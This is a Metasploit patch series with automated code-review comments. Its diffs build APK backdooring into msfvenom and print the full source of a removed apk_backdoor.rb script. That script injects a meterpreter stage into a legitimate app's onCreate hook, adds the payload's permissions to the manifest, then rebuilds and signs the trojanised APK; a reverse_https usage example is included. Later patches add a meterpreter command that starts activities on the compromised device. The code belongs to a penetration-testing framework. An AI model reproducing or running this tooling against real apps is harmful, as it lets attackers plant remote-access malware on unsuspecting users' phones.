From: Tim Date: Tue, 22 Dec 2015 15:58:27 +0000 Subject: [PATCH 14/71] integrate ./msfvenom -x for android payloads --- lib/msf/core/payload/apk.rb | 98 ++++-------- lib/msf/core/payload_generator.rb | 6 +- tools/exploit/apk_backdoor.rb | 255 ------------------------------ 3 files changed, 36 insertions(+), 323 deletions(-) delete mode 100755 tools/exploit/apk_backdoor.rb diff --git a/lib/msf/core/payload/apk.rb b/lib/msf/core/payload/apk.rb index bdfdb4421d..107d70d5b7 100644 --- a/lib/msf/core/payload/apk.rb +++ b/lib/msf/core/payload/apk.rb @@ -1,6 +1,7 @@ # -*- coding: binary -*- require 'msf/core' +require 'rex/text' require 'tmpdir' require 'nokogiri' require 'fileutils' @@ -9,6 +10,21 @@ require 'open3' module Msf::Payload::Apk + class ApkBackdoor + include Msf::Payload::Apk + def backdoor_apk(apk, payload) + backdoor_payload(apk, payload) + end + end + + def print_status(msg='') + $stderr.puts "[*] #{msg}" + end + + def print_error(msf='') + $stderr.puts "[-] #{msg}" + end + def usage print_error "Usage: #{$0} [target.apk] [msfvenom options]\n" print_error "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443\n" 
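Review bot: The new `print_error` in the `@@ -9,6 +10,21 @@` hunk names its parameter `msf` but interpolates `msg`, so every call raises NameError instead of printing the message; the signature should read `def print_error(msg='')`. All the failure paths in `backdoor_payload` go through this method, so the missing-tool and version diagnostics are lost to an unrelated exception. Both helpers are defined as instance methods of `Msf::Payload::Apk`, so any class that includes the module gets these `$stderr` versions of `print_status`/`print_error` in its ancestor chain, which may shadow framework output helpers; keeping them private to `ApkBackdoor` would avoid that.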
@@ -46,46 +62,6 @@ module Msf::Payload::Apk end end - # If XML parsing of the manifest fails, recursively search - # the smali code for the onCreate() hook and let the user - # pick the injection point - - def scrape_files_for_launcher_activity(tempdir) - smali_files||=[] - Dir.glob("#{tempdir}/original/smali*/**/*.smali") do |file| - checkFile=File.read(file) - if (checkFile.include?";->onCreate(Landroid/os/Bundle;)V") - smali_files << file - smalifile = file - activitysmali = checkFile - end - end - i=0 - print_status "[*] Please choose from one of the following:\n" - smali_files.each{|s_file| - print_status "[+] Hook point ",i,": ",s_file,"\n" - i+=1 - } - hook=-1 - while (hook < 0 || hook>i) - print_status "\nHook: " - hook = STDIN.gets.chomp.to_i - end - i=0 - smalifile="" - activitysmali="" - smali_files.each{|s_file| - if (i==hook) - checkFile=File.read(s_file) - smalifile=s_file - activitysmali = checkFile - break - end - i+=1 - } - return [smalifile,activitysmali] - end - def fix_manifest(tempdir) payload_permissions=[] @@ -119,7 +95,7 @@ module Msf::Payload::Apk add_permissions=[] for permission in payload_permissions if !(original_permissions.include? permission) - print_status "[*] Adding #{permission}\n" + print_status("Adding #{permission}") add_permissions << permission end end 
@@ -149,19 +125,19 @@ module Msf::Payload::Apk jarsigner = run_cmd("jarsigner") unless jarsigner != nil - print_error "[-] jarsigner not found. If it's not in your PATH, please add it.\n" + print_error("jarsigner not found. If it's not in your PATH, please add it.") exit(1) end apktool = run_cmd("apktool -version") unless apktool != nil - print_error "[-] apktool not found. If it's not in your PATH, please add it.\n" + print_error "apktool not found. If it's not in your PATH, please add it." exit(1) end apk_v = Gem::Version.new(apktool) unless apk_v >= Gem::Version.new('2.0.1') - print_error "[-] apktool version #{apk_v} not supported, please download at least version 2.0.1.\n" + print_error "apktool version #{apk_v} not supported, please download at least version 2.0.1." exit(1) end 
@@ -171,54 +147,46 @@ module Msf::Payload::Apk File.open("#{tempdir}/payload.apk", "wb") {|file| file.puts raw_payload } FileUtils.cp apkfile, "#{tempdir}/original.apk" - print_status "[*] Decompiling original APK..\n" + print_status "Decompiling original APK..\n" run_cmd("apktool d #{tempdir}/original.apk -o #{tempdir}/original") - print_status "[*] Decompiling payload APK..\n" + print_status "Decompiling payload APK..\n" run_cmd("apktool d #{tempdir}/payload.apk -o #{tempdir}/payload") f = File.open("#{tempdir}/original/AndroidManifest.xml") amanifest = Nokogiri::XML(f) f.close - print_status "[*] Locating onCreate() hook..\n" + print_status "Locating onCreate() hook..\n" launcheractivity = find_launcher_activity(amanifest) smalifile = "#{tempdir}/original/smali/" + launcheractivity.gsub(/\./, "/") + ".smali" begin activitysmali = File.read(smalifile) rescue Errno::ENOENT - print_status "[!] Unable to find correct hook automatically\n" - begin - results=scrape_files_for_launcher_activity(tempdir) - smalifile=results[0] - activitysmali=results[1] - rescue - print_error "[-] Error finding launcher activity. 
Exiting" - exit(1) - end + print_status "Unable to find correct hook automatically\n" + exit end - print_status "[*] Copying payload files..\n" + print_status "Copying payload files..\n" FileUtils.mkdir_p("#{tempdir}/original/smali/com/metasploit/stage/") FileUtils.cp Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/Payload*.smali"), "#{tempdir}/original/smali/com/metasploit/stage/" activitycreate = ';->onCreate(Landroid/os/Bundle;)V' payloadhook = activitycreate + "\n invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V" hookedsmali = activitysmali.gsub(activitycreate, payloadhook) - print_status "[*] Loading ",smalifile," and injecting payload..\n" + print_status "Loading #{smalifile} and injecting payload..\n" File.open(smalifile, "wb") {|file| file.puts hookedsmali } - injected_apk = apkfile.sub('.apk', '_backdoored.apk') - - print_status "[*] Poisoning the manifest with meterpreter permissions..\n" + injected_apk = "#{tempdir}/output.apk" + print_status "Poisoning the manifest with meterpreter permissions..\n" fix_manifest(tempdir) - print_status "[*] Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}\n" + print_status "Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}\n" run_cmd("apktool b -o #{injected_apk} #{tempdir}/original") - print_status "[*] Signing #{injected_apk}\n" + print_status "Signing #{injected_apk}\n" run_cmd("jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{injected_apk} androiddebugkey") + outputapk = File.read(injected_apk) + rescue FileUtils.remove_entry tempdir - - puts "[+] Infected file #{injected_apk} ready.\n" end end diff --git a/lib/msf/core/payload_generator.rb b/lib/msf/core/payload_generator.rb index b051bbc97e..11434d52e4 100644 --- a/lib/msf/core/payload_generator.rb +++ b/lib/msf/core/payload_generator.rb 
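Review bot: At the end of `backdoor_payload` (its start lies outside this hunk), the bare `rescue` before `FileUtils.remove_entry tempdir` means the temporary directory is removed only when something raised; on success the decompiled tree and generated APK stay on disk. It also swallows every StandardError, so the caller receives the return value of `remove_entry` instead of APK bytes and fails later at `raw_payload.length`. Replacing `rescue` with `ensure` and guarding the cleanup, `FileUtils.remove_entry(tempdir) if tempdir`, keeps the return value and always cleans up. The hook-not-found branch calls `exit` with no argument, which reports success to the shell and bypasses the cleanup; a raised error or `exit(1)` would be consistent with the other failure paths. `File.binread(injected_apk)` would make the binary read explicit.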
@@ -310,9 +310,9 @@ module Msf cli_print "Payload size: #{raw_payload.length} bytes" raw_payload elsif payload.start_with? "android/" - cli_print "Using template: #{template}" - - raw_payload = generate_raw_payload + cli_print "Using APK template: #{template}" + apk_backdoor = ::Msf::Payload::Apk::ApkBackdoor::new() + raw_payload = apk_backdoor.backdoor_apk(template, generate_raw_payload) cli_print "Payload size: #{raw_payload.length} bytes" raw_payload else diff --git a/tools/exploit/apk_backdoor.rb b/tools/exploit/apk_backdoor.rb deleted file mode 100755 index fd6e2ca56d..0000000000 --- a/tools/exploit/apk_backdoor.rb +++ /dev/null 
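Review bot: The `elsif payload.start_with? "android/"` branch now routes every Android payload through `backdoor_apk(template, ...)`, with no check that a template was supplied. Judging by the `unless apkfile && File.readable?(apkfile)` guard in `backdoor_payload`, a nil or unreadable `template` ends in `usage; exit(1)`, so ordinary Android payload generation without a template would abort the process. Restricting the branch, for example `elsif payload.start_with?("android/") && template`, lets the untemplated case fall through to the existing path. `generate_payload` continues outside this hunk, so it is not visible here how the final `else` branch treats Android payloads.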
@@ -1,255 +0,0 @@ -#!/usr/bin/env ruby -# -# This script is a POC for injecting metasploit payloads on -# arbitrary APKs. -# Authored by timwr, Jack64 -# - -require 'tmpdir' -require 'nokogiri' -require 'fileutils' -require 'optparse' -require 'open3' - -def usage - $stderr.puts "Usage: #{$0} [target.apk] [msfvenom options]\n" - $stderr.puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443\n" -end - -def run_cmd(cmd) - begin - stdin, stdout, stderr = Open3.popen3(cmd) - return stdout.read + stderr.read - rescue Errno::ENOENT - return nil - end -end - - -# Find the activity that is opened when you click the app icon -def find_launcher_activity(amanifest) - package = amanifest.xpath("//manifest").first['package'] - activities = amanifest.xpath("//activity|//activity-alias") - for activity in activities - activityname = activity.attribute("name") - category = activity.search('category') - unless category - next - end - for cat in category - categoryname = cat.attribute('name') - if (categoryname.to_s == 'android.intent.category.LAUNCHER' || categoryname.to_s == 'android.intent.action.MAIN') - activityname = activityname.to_s - unless activityname.start_with?(package) - activityname = package + activityname - end - return activityname - end - end - end -end - -# If XML parsing of the manifest fails, recursively search -# the smali code for the onCreate() hook and let the user -# pick the injection point - -def scrape_files_for_launcher_activity(tempdir) - smali_files||=[] - Dir.glob("#{tempdir}/original/smali*/**/*.smali") do |file| - checkFile=File.read(file) - if (checkFile.include?";->onCreate(Landroid/os/Bundle;)V") - smali_files << file - smalifile = file - activitysmali = checkFile - end - end - i=0 - print "[*] Please choose from one of the following:\n" - smali_files.each{|s_file| - print "[+] Hook point ",i,": ",s_file,"\n" - i+=1 - } - hook=-1 - while (hook < 0 || hook>i) - print "\nHook: " - hook = 
STDIN.gets.chomp.to_i - end - i=0 - smalifile="" - activitysmali="" - smali_files.each{|s_file| - if (i==hook) - checkFile=File.read(s_file) - smalifile=s_file - activitysmali = checkFile - break - end - i+=1 - } - return [smalifile,activitysmali] -end - -def fix_manifest(tempdir) - payload_permissions=[] - - #Load payload's permissions - File.open("#{tempdir}/payload/AndroidManifest.xml","rb"){|file| - k=File.read(file) - payload_manifest=Nokogiri::XML(k) - permissions = payload_manifest.xpath("//manifest/uses-permission") - for permission in permissions - name=permission.attribute("name") - payload_permissions << name.to_s - end - } - - original_permissions=[] - apk_mani="" - - #Load original apk's permissions - File.open("#{tempdir}/original/AndroidManifest.xml","rb"){|file2| - k=File.read(file2) - apk_mani=k - original_manifest=Nokogiri::XML(k) - permissions = original_manifest.xpath("//manifest/uses-permission") - for permission in permissions - name=permission.attribute("name") - original_permissions << name.to_s - end - } - - #Get permissions that are not in original APK - add_permissions=[] - for permission in payload_permissions - if !(original_permissions.include? permission) - print "[*] Adding #{permission}\n" - add_permissions << permission - end - end - - inject=0 - new_mani="" - #Inject permissions in original APK's manifest - for line in apk_mani.split("\n") - if (line.include? "uses-permission" and inject==0) - for permission in add_permissions - new_mani << ''+"\n" - end - new_mani << line+"\n" - inject=1 - else - new_mani << line+"\n" - end - end - File.open("#{tempdir}/original/AndroidManifest.xml", "wb") {|file| file.puts new_mani } -end - -def backdoor_payload(apkfile, raw_payload) - unless apkfile && File.readable?(apkfile) - usage - exit(1) - end - - jarsigner = run_cmd("jarsigner") - unless jarsigner != nil - $stderr.puts "[-] jarsigner not found. 
If it's not in your PATH, please add it.\n" - exit(1) - end - - apktool = run_cmd("apktool -version") - unless apktool != nil - $stderr.puts "[-] apktool not found. If it's not in your PATH, please add it.\n" - exit(1) - end - - apk_v = Gem::Version.new(apktool) - unless apk_v >= Gem::Version.new('2.0.1') - $stderr.puts "[-] apktool version #{apk_v} not supported, please download at least version 2.0.1.\n" - exit(1) - end - - #Create temporary directory where work will be done - tempdir = Dir.mktmpdir - - File.open("#{tempdir}/payload.apk", "wb") {|file| file.puts raw_payload } - FileUtils.cp apkfile, "#{tempdir}/original.apk" - - print "[*] Decompiling original APK..\n" - run_cmd("apktool d #{tempdir}/original.apk -o #{tempdir}/original") - print "[*] Decompiling payload APK..\n" - run_cmd("apktool d #{tempdir}/payload.apk -o #{tempdir}/payload") - - f = File.open("#{tempdir}/original/AndroidManifest.xml") - amanifest = Nokogiri::XML(f) - f.close - - print "[*] Locating onCreate() hook..\n" - - launcheractivity = find_launcher_activity(amanifest) - smalifile = "#{tempdir}/original/smali/" + launcheractivity.gsub(/\./, "/") + ".smali" - begin - activitysmali = File.read(smalifile) - rescue Errno::ENOENT - print "[!] Unable to find correct hook automatically\n" - begin - results=scrape_files_for_launcher_activity(tempdir) - smalifile=results[0] - activitysmali=results[1] - rescue - $stderr.puts "[-] Error finding launcher activity. 
Exiting" - exit(1) - end - end - - print "[*] Copying payload files..\n" - FileUtils.mkdir_p("#{tempdir}/original/smali/com/metasploit/stage/") - FileUtils.cp Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/Payload*.smali"), "#{tempdir}/original/smali/com/metasploit/stage/" - activitycreate = ';->onCreate(Landroid/os/Bundle;)V' - payloadhook = activitycreate + "\n invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V" - hookedsmali = activitysmali.gsub(activitycreate, payloadhook) - print "[*] Loading ",smalifile," and injecting payload..\n" - File.open(smalifile, "wb") {|file| file.puts hookedsmali } - injected_apk = apkfile.sub('.apk', '_backdoored.apk') - - print "[*] Poisoning the manifest with meterpreter permissions..\n" - fix_manifest(tempdir) - - print "[*] Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}\n" - run_cmd("apktool b -o #{injected_apk} #{tempdir}/original") - print "[*] Signing #{injected_apk}\n" - run_cmd("jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{injected_apk} androiddebugkey") - - FileUtils.remove_entry tempdir - - puts "[+] Infected file #{injected_apk} ready.\n" -end - -if __FILE__ == $0 - begin - msfvenom_opts = ARGV[1,ARGV.length] - opts="" - msfvenom_opts.each{|x| - opts+=x - opts+=" " - } - rescue - $stderr.puts "[-] Error parsing msfvenom options. Exiting.\n" - usage - exit(1) - end - - print "[*] Generating msfvenom payload..\n" - msfvenom_path = File.expand_path(File.join(File.dirname(__FILE__), "..", "..", "msfvenom")) - msfvenom_command = "#{msfvenom_path} -f raw #{opts}" - begin - stdin, stdout, stderr = Open3.popen3(msfvenom_command) - payload = stdout.read - msfvenom_output = stderr.read - backdoor_payload(ARGV[0], payload) - rescue Errno::ENOENT - $stderr.puts msfvenom_output - exit(1) - end - -end - From d2a9aa18d89b1be5055f0597aad96913e3d3f327 Mon Sep 17 00:00:00 2001 
From: Tim Date: Tue, 22 Dec 2015 16:06:01 +0000 Subject: [PATCH 15/71] fix sillyness --- lib/msf/core/payload_generator.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/payload_generator.rb b/lib/msf/core/payload_generator.rb index 11434d52e4..74ee6b6c4e 100644 --- a/lib/msf/core/payload_generator.rb +++ b/lib/msf/core/payload_generator.rb @@ -309,7 +309,7 @@ module Msf raw_payload = generate_java_payload cli_print "Payload size: #{raw_payload.length} bytes" raw_payload - elsif payload.start_with? "android/" + elsif payload.start_with? "android/" and not template.blank? cli_print "Using APK template: #{template}" apk_backdoor = ::Msf::Payload::Apk::ApkBackdoor::new() raw_payload = apk_backdoor.backdoor_apk(template, generate_raw_payload) From 69b65e7d397ff4aa247629fad508da5cc175f6f8 Mon Sep 17 00:00:00 2001 From: Tim Date: Thu, 24 Dec 2015 09:13:56 +0000 Subject: [PATCH 16/71] fix error handling --- lib/msf/core/payload/apk.rb | 23 ++++++++++------------- 1 file changed, 10 insertions(+), 13 deletions(-) diff --git a/lib/msf/core/payload/apk.rb b/lib/msf/core/payload/apk.rb index 107d70d5b7..62764370a0 100644 --- a/lib/msf/core/payload/apk.rb +++ b/lib/msf/core/payload/apk.rb @@ -21,13 +21,13 @@ module Msf::Payload::Apk $stderr.puts "[*] #{msg}" end - def print_error(msf='') + def print_error(msg='') $stderr.puts "[-] #{msg}" end def usage - print_error "Usage: #{$0} [target.apk] [msfvenom options]\n" - print_error "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443\n" + print_error "Usage: #{$0} -x [target.apk] [msfvenom options]\n" + print_error "e.g. #{$0} -x messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443\n" end def run_cmd(cmd) 
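Review bot: In the `@@ -309,7 +309,7 @@` hunk, the new condition `payload.start_with? "android/" and not template.blank?` relies on the low precedence of `and`/`not` combined with a paren-less method call. It parses as intended today, but replacing `and` with `&&` without adding parentheses would pass the whole boolean expression to `start_with?` as its argument. Writing it as `elsif payload.start_with?("android/") && !template.blank?` removes that trap. The enclosing method lies outside the hunk.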
@@ -120,25 +120,22 @@ module Msf::Payload::Apk def backdoor_payload(apkfile, raw_payload) unless apkfile && File.readable?(apkfile) usage - exit(1) + raise RuntimeError, "Invalid template: #{apkfile}" end jarsigner = run_cmd("jarsigner") unless jarsigner != nil - print_error("jarsigner not found. If it's not in your PATH, please add it.") - exit(1) + raise RuntimeError, "jarsigner not found. If it's not in your PATH, please add it." end apktool = run_cmd("apktool -version") unless apktool != nil - print_error "apktool not found. If it's not in your PATH, please add it." - exit(1) + raise RuntimeError, "apktool not found. If it's not in your PATH, please add it." end apk_v = Gem::Version.new(apktool) unless apk_v >= Gem::Version.new('2.0.1') - print_error "apktool version #{apk_v} not supported, please download at least version 2.0.1." - exit(1) + raise RuntimeError, "apktool version #{apk_v} not supported, please download at least version 2.0.1." end #Create temporary directory where work will be done @@ -163,8 +160,7 @@ module Msf::Payload::Apk begin activitysmali = File.read(smalifile) rescue Errno::ENOENT - print_status "Unable to find correct hook automatically\n" - exit + raise RuntimeError, "Unable to find hook point in #{apkfile}\n" end print_status "Copying payload files..\n" @@ -185,8 +181,9 @@ module Msf::Payload::Apk run_cmd("jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{injected_apk} androiddebugkey") outputapk = File.read(injected_apk) - rescue + FileUtils.remove_entry tempdir + outputapk end end From 5d0e868fd6422bafaf102c57398837acac8a46ef Mon Sep 17 00:00:00 2001 From: Tim Date: Thu, 24 Dec 2015 12:21:08 +0000 Subject: [PATCH 17/71] facebook.orca fixes --- lib/msf/core/payload/apk.rb | 46 +++++++++++++++++++++++++------------ 1 file changed, 31 insertions(+), 15 deletions(-) 
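Review bot: `Gem::Version.new(apktool)` is fed the raw return value of `run_cmd("apktool -version")`. If `run_cmd` here still returns stdout and stderr concatenated, as the deleted tools/exploit/apk_backdoor.rb version did, any warning or extra text makes `Gem::Version.new` raise ArgumentError instead of the RuntimeError this commit standardizes on. Extracting the number first, e.g. `apktool[/\d+(\.\d+)+/]`, and raising RuntimeError when nothing matches keeps the error handling uniform. As style, `unless jarsigner != nil` and `unless apktool != nil` read more directly as `if jarsigner.nil?` and `if apktool.nil?`. `backdoor_payload` continues beyond this hunk.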
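Review bot: The `raise RuntimeError, "Unable to find hook point in #{apkfile}\n"` added in `@@ -163,8 +160,7 @@` appears to fire after the temporary directory has been created. The `FileUtils.remove_entry tempdir` kept in `@@ -185,8 +181,9 @@` runs only on the success path, so every failure from that point on leaves the working directory and its contents on disk. Moving the cleanup into an `ensure` clause, or using the block form `Dir.mktmpdir do |tempdir|`, removes the directory on both paths. In the same later hunk, `outputapk = File.read(injected_apk)` reads a binary file in text mode; `File.binread(injected_apk)` avoids newline and encoding translation. The method body starts before and ends after these hunks.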
diff --git a/lib/msf/core/payload/apk.rb b/lib/msf/core/payload/apk.rb index 62764370a0..7aa9c34bb6 100644 --- a/lib/msf/core/payload/apk.rb +++ b/lib/msf/core/payload/apk.rb @@ -44,7 +44,10 @@ module Msf::Payload::Apk package = amanifest.xpath("//manifest").first['package'] activities = amanifest.xpath("//activity|//activity-alias") for activity in activities - activityname = activity.attribute("name") + activityname = activity.attribute("targetActivity") + unless activityname + activityname = activity.attribute("name") + end category = activity.search('category') unless category next @@ -52,11 +55,11 @@ module Msf::Payload::Apk for cat in category categoryname = cat.attribute('name') if (categoryname.to_s == 'android.intent.category.LAUNCHER' || categoryname.to_s == 'android.intent.action.MAIN') - activityname = activityname.to_s - unless activityname.start_with?(package) - activityname = package + activityname + name = activityname.to_s + if name.start_with?('.') + name = package + name end - return activityname + return name end end end 
@@ -153,22 +156,35 @@ module Msf::Payload::Apk amanifest = Nokogiri::XML(f) f.close - print_status "Locating onCreate() hook..\n" - + print_status "Locating hook point..\n" launcheractivity = find_launcher_activity(amanifest) - smalifile = "#{tempdir}/original/smali/" + launcheractivity.gsub(/\./, "/") + ".smali" - begin - activitysmali = File.read(smalifile) - rescue Errno::ENOENT - raise RuntimeError, "Unable to find hook point in #{apkfile}\n" + unless launcheractivity + raise RuntimeError, "Unable to find hookable activity in #{apkfile}\n" + end + smalifile = "#{tempdir}/original/smali*/" + launcheractivity.gsub(/\./, "/") + ".smali" + smalifiles = Dir.glob(smalifile) + for smalifile in smalifiles + if File.readable?(smalifile) + activitysmali = File.read(smalifile) + end + end + + unless activitysmali + raise RuntimeError, "Unable to find hook point in #{smalifiles}\n" + end + + entrypoint = ';->onCreate(Landroid/os/Bundle;)V' + unless activitysmali.include? entrypoint + raise RuntimeError, "Unable to find onCreate() in #{smalifile}\n" end print_status "Copying payload files..\n" FileUtils.mkdir_p("#{tempdir}/original/smali/com/metasploit/stage/") FileUtils.cp Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/Payload*.smali"), "#{tempdir}/original/smali/com/metasploit/stage/" - activitycreate = ';->onCreate(Landroid/os/Bundle;)V' - payloadhook = activitycreate + "\n invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V" - hookedsmali = activitysmali.gsub(activitycreate, payloadhook) + + payloadhook = entrypoint + "\n invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V" + hookedsmali = activitysmali.gsub(entrypoint, payloadhook) + print_status "Loading #{smalifile} and injecting payload..\n" File.open(smalifile, "wb") {|file| file.puts hookedsmali } injected_apk = "#{tempdir}/output.apk" From f48e4363f5b521ee557250e4ad0d8dddeb962321 Mon Sep 17 00:00:00 2001 
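Review bot: `for smalifile in smalifiles` reuses the variable that held the glob pattern, so after the loop `smalifile` is the last path iterated (or still the pattern when nothing matched) while `activitysmali` holds the last readable match. The later `File.open(smalifile, "wb")` can therefore write to a different file than the one that was read. Keeping the pattern, the match list and the chosen path in separate variables fixes this, for example `hookfile = smalifiles.reverse.find { |f| File.readable?(f) }` followed by `activitysmali = File.read(hookfile) if hookfile`. The message `"Unable to find hook point in #{smalifiles}\n"` interpolates the whole array, which is empty exactly when the message is most likely to be shown; the pattern would be more useful there. The method starts before this hunk.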
From: Tim Date: Thu, 7 Jan 2016 09:22:42 +0000 Subject: [PATCH 18/71] activity_start --- .../meterpreter/extensions/android/android.rb | 7 +++++++ .../post/meterpreter/extensions/android/tlv.rb | 3 +-- .../ui/console/command_dispatcher/android.rb | 17 +++++++++++++++-- 3 files changed, 23 insertions(+), 4 deletions(-) diff --git a/lib/rex/post/meterpreter/extensions/android/android.rb b/lib/rex/post/meterpreter/extensions/android/android.rb index 931b591708..a98ea5bd28 100644 --- a/lib/rex/post/meterpreter/extensions/android/android.rb +++ b/lib/rex/post/meterpreter/extensions/android/android.rb @@ -242,6 +242,13 @@ class Android < Extension response.get_tlv(TLV_TYPE_CHECK_ROOT_BOOL).value end + def activity_start(uri) + request = Packet.create_request('activity_start') + request.add_tlv(TLV_TYPE_URI_STRING, uri) + response = client.send_request(request) + response + end + def send_sms(dest, body, dr) request = Packet.create_request('send_sms') request.add_tlv(TLV_TYPE_SMS_ADDRESS, dest) diff --git a/lib/rex/post/meterpreter/extensions/android/tlv.rb b/lib/rex/post/meterpreter/extensions/android/tlv.rb index 99f269327d..9f434cfffa 100644 --- a/lib/rex/post/meterpreter/extensions/android/tlv.rb +++ b/lib/rex/post/meterpreter/extensions/android/tlv.rb @@ -76,8 +76,7 @@ TLV_TYPE_CELL_BASE_LONG = TLV_META_TYPE_UINT | (TLV_EXTENSIONS TLV_TYPE_CELL_NET_ID = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 9073) TLV_TYPE_CELL_SYSTEM_ID = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 9074) - - +TLV_TYPE_URI_STRING = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9101) end end diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb index 8030c3329c..d72044d9ec 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb 
@@ -29,7 +29,8 @@ class Console::CommandDispatcher::Android 'device_shutdown' => 'Shutdown device', 'send_sms' => 'Sends SMS from target session', 'wlan_geolocate' => 'Get current lat-long using WLAN information', - 'interval_collect' => 'Manage interval collection capabilities' + 'interval_collect' => 'Manage interval collection capabilities', + 'activity_start' => 'Start an Android activity from a Uri string' } reqs = { @@ -41,7 +42,8 @@ class Console::CommandDispatcher::Android 'device_shutdown' => ['device_shutdown'], 'send_sms' => ['send_sms'], 'wlan_geolocate' => ['wlan_geolocate'], - 'interval_collect' => ['interval_collect'] + 'interval_collect' => ['interval_collect'], + 'activity_start' => ['activity_start'] } # Ensure any requirements of the command are met @@ -528,6 +530,17 @@ class Console::CommandDispatcher::Android end end + def cmd_activity_start(*args) + if (args.length < 1) + print_line("Usage: activity_start \n") + print_line("Start an Android activity from a uri") + return + end + + uri = args[0] + client.android.activity_start(uri) + end + # # Name for this dispatcher # From c76389629abd913edb6886af404cd442d9591d20 Mon Sep 17 00:00:00 2001 From: Tim Date: Tue, 12 Jan 2016 07:49:37 +0000 Subject: [PATCH 19/71] receive startActivity result --- lib/rex/post/meterpreter/extensions/android/android.rb | 2 +- lib/rex/post/meterpreter/extensions/android/tlv.rb | 1 + 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/lib/rex/post/meterpreter/extensions/android/android.rb b/lib/rex/post/meterpreter/extensions/android/android.rb index a98ea5bd28..32cc0f9af7 100644 --- a/lib/rex/post/meterpreter/extensions/android/android.rb +++ b/lib/rex/post/meterpreter/extensions/android/android.rb 
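Review bot: In `@@ -528,6 +530,17 @@`, `cmd_activity_start` discards the value returned by `client.android.activity_start(uri)`, so the console prints nothing whether the request succeeded, failed or raised. The handler should report the outcome through the dispatcher's existing print helpers once the call returns. The new method also has no comment, unlike the `# Name for this dispatcher` block that follows it; something like `# Asks the session to start the activity identified by the given URI string` would match the file's style.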
@@ -246,7 +246,7 @@ class Android < Extension request = Packet.create_request('activity_start') request.add_tlv(TLV_TYPE_URI_STRING, uri) response = client.send_request(request) - response + response.get_tlv(TLV_TYPE_ACTIVITY_START_RESULT).value end def send_sms(dest, body, dr) diff --git a/lib/rex/post/meterpreter/extensions/android/tlv.rb b/lib/rex/post/meterpreter/extensions/android/tlv.rb index 9f434cfffa..54cfa1488b 100644 --- a/lib/rex/post/meterpreter/extensions/android/tlv.rb +++ b/lib/rex/post/meterpreter/extensions/android/tlv.rb @@ -77,6 +77,7 @@ TLV_TYPE_CELL_NET_ID = TLV_META_TYPE_UINT | (TLV_EXTENSIONS TLV_TYPE_CELL_SYSTEM_ID = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 9074) TLV_TYPE_URI_STRING = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9101) +TLV_TYPE_ACTIVITY_START_RESULT = TLV_META_TYPE_BOOL | (TLV_EXTENSIONS + 9102) end end From 1f61eb50bedf6494d6b3867a12e1141e1239b153 Mon Sep 17 00:00:00 2001 From: James Lee Date: Thu, 14 Jan 2016 09:09:29 -0600 Subject: [PATCH 20/71] Sort methods --- lib/msf/core/exploit/tcp.rb | 66 ++++++++++++++++++------------------- 1 file changed, 33 insertions(+), 33 deletions(-) diff --git a/lib/msf/core/exploit/tcp.rb b/lib/msf/core/exploit/tcp.rb index f4a6daef6c..7c342a3a03 100644 --- a/lib/msf/core/exploit/tcp.rb +++ b/lib/msf/core/exploit/tcp.rb @@ -82,11 +82,6 @@ module Exploit::Remote::Tcp ) end - # Returns the rhost:rport - def peer - "#{rhost}:#{rport}" - end - # # Establishes a TCP connection to the specified RHOST/RPORT # @@ -207,17 +202,24 @@ module Exploit::Remote::Tcp ## # - # Returns the target host + # Returns the local host for outgoing connections # - def rhost - datastore['RHOST'] + def chost + datastore['CHOST'] end # - # Returns the remote port + # Returns the TCP connection timeout # - def rport - datastore['RPORT'] + def connect_timeout + datastore['ConnectTimeout'] + end + + # + # Returns the local port for outgoing connections + # + def cport + datastore['CPORT'] end # 
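Review bot: In `@@ -246,7 +246,7 @@`, `response.get_tlv(TLV_TYPE_ACTIVITY_START_RESULT).value` assumes the TLV is always present in the response. If `get_tlv` returns nil for a missing TLV (its definition is not on this page), a peer that does not send the new field turns the call into a NoMethodError instead of a clean failure. Splitting it into `tlv = response.get_tlv(TLV_TYPE_ACTIVITY_START_RESULT)` and `tlv ? tlv.value : false` keeps the return value boolean in both cases.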
